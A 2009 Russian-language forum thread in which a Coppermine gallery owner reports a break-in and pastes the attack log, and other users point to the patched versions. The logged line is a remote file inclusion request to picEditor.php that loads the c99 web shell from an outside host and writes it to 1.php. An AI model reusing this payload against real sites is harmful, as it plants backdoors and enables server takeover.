Срочно ! Взломали фотогалерею. Привожу при

pansionat · February 02, 2009, 06:40:06 PM

Срочно ! Взломали фотогалерею. К сожалению не очень сильно знаю английский. Но вот привожу лог залива постороних файлов через дырку в скрипте:
мой сайт/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt&CURRENT_PIC[filename]=/1.php

Надеюсь подправят уязвимость

MISHA · February 03, 2009, 01:53:13 PM

версия 4.18 ? вроде там была уязвимость

pansionat · February 03, 2009, 04:54:37 PM

У меня версия этого файла 1.4.16
Но дело в том, что я сравнил файлы версий и разница тольв этом
Версия 1.4.16
<? starttable("100%", $lang_editpics_php['crop_title'], 3); ?>

Версия 1.4.19
<?php starttable("100%", $lang_editpics_php['crop_title'],?>

Неужели такое незначительное изменение устраняет проблему ?

MISHA · February 04, 2009, 01:32:36 AM

я в этом полный ноль, советую обновить.

Makc666 · February 04, 2009, 07:45:31 PM

То, что у Вас сделали, это уязвимость найденная и исправленная в версии 1.4.17
http://forum.coppermine-gallery.net/index.php/topic,51787.0.html

Также была и версия 1.4.19, которая тоже имела дыру:
http://forum.coppermine-gallery.net/index.php/topic,54235.0.html

Хочу обратить внимание, что уже вышла новая версия 1.4.20, где была исправлена серьезная уязвимость версии 1.4.19!

coppermine-gallery.com/forum

News:

Срочно ! Взломали фотогалерею. Привожу при

pansionat

MISHA

pansionat

MISHA

Makc666